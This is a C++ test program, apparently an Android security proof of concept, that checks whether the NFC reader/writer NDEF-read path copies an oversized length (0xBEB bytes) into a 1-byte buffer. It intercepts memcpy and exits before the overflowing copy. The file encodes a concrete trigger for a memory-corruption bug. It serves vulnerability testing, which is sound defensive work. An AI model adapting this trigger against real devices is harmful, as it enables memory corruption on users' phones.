1 /*
2 * Copyright (C) 2021 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16
17 #include <dlfcn.h>
18 #include <nfa_rw_int.h>
19 #include <nfc_int.h>
20 #include <rw_int.h>
21 #include <stdlib.h>
22 #include "../includes/common.h"
23
// Byte count the memcpy interposer treats as the vulnerable copy: main() builds
// an NFC_HDR with len == LENGTH next to a 1-byte p_ndef_buf (see memcpy below).
#define LENGTH 0xBEB

extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;  // declared for the NFC stack; not referenced in this file
void rw_init(void);
void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl);
bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data);

// Set by init() once the real memcpy has been resolved; memcpy() checks it on every call.
bool isInitialized = false;

// The next memcpy in the symbol lookup chain (libc's), resolved with dlsym(RTLD_NEXT)
// so the interposer can forward ordinary copies to it. Stays null if dlsym fails.
static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr;
35
// Resolves the next memcpy in the lookup chain (the real libc one) and marks the
// interposer ready. If dlsym fails, real_memcpy stays null and isInitialized stays
// false, so memcpy() will call init() again on its next invocation.
void init(void) {
  void *next_memcpy = dlsym(RTLD_NEXT, "memcpy");
  if (next_memcpy == nullptr) {
    return;
  }
  real_memcpy = reinterpret_cast<void *(*)(void *, const void *, size_t)>(next_memcpy);
  isInitialized = true;
}
43
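// Interposes libc memcpy for the whole process. main() sets up a 1-byte
// nfa_rw_cb.p_ndef_buf and an NFC_HDR whose len is LENGTH; a copy of exactly
// LENGTH bytes during the RW callback is taken as the signature of the
// unpatched code (presumably it copies len bytes into that buffer -- not
// visible here), and the process exits with EXIT_VULNERABLE before the copy
// runs. Every other call is forwarded unchanged to the real memcpy.
void *memcpy(void *to, const void *from, size_t numBytes) {
  if (!isInitialized) {
    init();
  }
  // init() leaves real_memcpy null when dlsym fails; calling through a null
  // function pointer is undefined behavior, so fail explicitly instead.
  if (real_memcpy == nullptr) {
    abort();
  }
  if (numBytes == LENGTH) {
    exit(EXIT_VULNERABLE);
  }
  return real_memcpy(to, from, numBytes);
}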
53
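// Releases the allocations main() made, child before parent, and returns
// `status` unchanged so callers can write `return freeResourcesAndReturn(...)`.
// ptr2 is the tNFC_ACTIVATE_DEVT hung off ptr1 and ptr4 the NFC_HDR hung off
// ptr3. free(nullptr) is a no-op, so omitted arguments cost nothing and -- unlike
// the previous nested guards -- a child is released even when its parent is not
// passed.
int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr,
                           tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr,
                           NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) {
  free(ptr2);
  free(ptr1);
  free(ptr4);
  free(ptr3);
  free(ptr5);
  return status;
}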
74
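// Drives the NFA reader/writer NDEF-read path with a header whose len (LENGTH)
// far exceeds the 1-byte p_ndef_buf. The memcpy interposer above decides the
// outcome: it exits with EXIT_VULNERABLE if a LENGTH-byte copy is attempted;
// otherwise this returns EXIT_SUCCESS (or EXIT_FAILURE on allocation failure).
int main() {
  GKI_init();
  rw_init();
  // Zero-initialized so NFA_Init never sees an indeterminate entry table.
  tHAL_NFC_ENTRY p_hal_entry_tbl = {};
  NFA_Init(&p_hal_entry_tbl);

  // calloc rather than malloc: only a few fields are set explicitly below, and
  // the RW code may read the others, so make them deterministic (zero).
  tNFA_RW_MSG *p_data = (tNFA_RW_MSG *)calloc(1, sizeof(tNFA_RW_MSG));
  if (!p_data) {
    return EXIT_FAILURE;
  }
  p_data->activate_ntf.p_activate_params =
      (tNFC_ACTIVATE_DEVT *)calloc(1, sizeof(tNFC_ACTIVATE_DEVT));
  if (!(p_data->activate_ntf.p_activate_params)) {
    return freeResourcesAndReturn(EXIT_FAILURE, p_data);
  }

  tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params;
  p_activate_params->protocol = NFC_PROTOCOL_T2T;

  // Activation installs rw_cb.p_cback, which is read right after this call.
  nfa_rw_activate_ntf(p_data);

  tRW_CBACK *p_cback = rw_cb.p_cback;
  tRW_DATA *p_rw_data = (tRW_DATA *)calloc(1, sizeof(tRW_DATA));
  if (!p_rw_data) {
    return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params);
  }

  nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF;
  p_rw_data->data.p_data = (NFC_HDR *)calloc(1, sizeof(NFC_HDR));
  if (!(p_rw_data->data.p_data)) {
    return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
                                  p_rw_data);
  }

  // Destination buffer is deliberately a single byte; the header below claims
  // LENGTH bytes.
  nfa_rw_cb.p_ndef_buf = (uint8_t *)calloc(1, sizeof(uint8_t));
  if (!(nfa_rw_cb.p_ndef_buf)) {
    return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params,
                                  p_rw_data, p_rw_data->data.p_data);
  }

  p_rw_data->data.p_data->len = LENGTH;
  if (p_cback) {
    p_cback(RW_T3T_CHECK_EVT, p_rw_data);
  }

  return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params,
                                p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf);
}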
123